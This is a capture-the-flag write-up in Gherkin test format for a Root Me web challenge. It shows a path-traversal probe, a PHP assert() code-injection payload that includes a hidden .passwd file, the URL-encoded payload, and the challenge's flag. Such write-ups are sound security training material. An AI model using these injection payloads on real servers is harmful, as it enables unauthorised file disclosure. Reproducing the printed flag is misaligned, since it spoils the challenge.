## Version 2.0
## language: en

Feature:  Web Server - Root Me
  Site:
    www.root-me.org
  Category:
    Web Server
  User:
    jdanilo7
  Goal:
    Read the .passwd file exploiting a php assert function call

  Background:
  Hacker's software
    |     <Software name>      |    <Version>    |
    |     Firefox Quantum      |      65.0.2     |
  Machine information:
    Given The challenge url
    """
    http://challenge01.root-me.org/web-serveur/ch47/
    """
    And The challenge statement
    """
    Find and exploit the vulnerability to read the file .passwd.
    """
    Then I am asked to read the passwd file exploiting an assert function call

  Scenario: Fail: Enter php code directly into the address bar
    Given I have entered the challenge web page
    Then I notice there are three links
    Given I click the one that says "About"
    Then I am redirected to a web page with the following url
    """
    http://challenge01.root-me.org/web-serveur/ch47/?page=about
    """
    Given I enter the following url
    """
    http://challenge01.root-me.org/web-serveur/ch47/?page=/../../../etc/passwd
    """
    Then I get this warning message
    """
    Warning: assert(): Assertion "strpos('includes//../../../etc/passwd.php',
    '..') === false" failed in /challenge/web-serveur/ch47/index.php on line 8
    Detected hacking attempt!
    """
    And I realize I can exploit the assert function call
    Given I enter the following payload
    """
    http://challenge01.root-me.org/web-serveur/ch47/?page=', 'qwer') == false
    && strlen(include('.passwd'))==0 && strpos('1
    """
    Then I get this error message
    """
    Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING in /chall
    enge/web-serveur/ch47/index.php(8) : assert code on line 1
    Catchable fatal error: assert(): Failure evaluating code:
    strpos('includes/', 'qwer') == false .php', '..') === false in /challenge
    /web-serveur/ch47/index.php on line 8
    """
    And I don't get the flag

  Scenario: Success: Enter url encoded php code into the address bar
    Given I take the following payload
    """
    http://challenge01.root-me.org/web-serveur/ch47/?page=', 'qwer') == false
    && strlen(include('.passwd'))==0 && strpos('1
    """
    And encode it using a url encoder
    """
    %27%2C%20%27qwer%27)%20%3D%3D%20false%20%26%26%20strlen(include(%27.passwd
    %27))%3D%3D0%20%26%26%20strpos(%271
    """
    And I enter it into the address bar
    Then I get this message
    """
    The flag is / Le flag est : x4Ss3rT1nglSn0ts4f3A7A1Lx
    """
    And I validate the flag on the challenge website
    And it is accepted
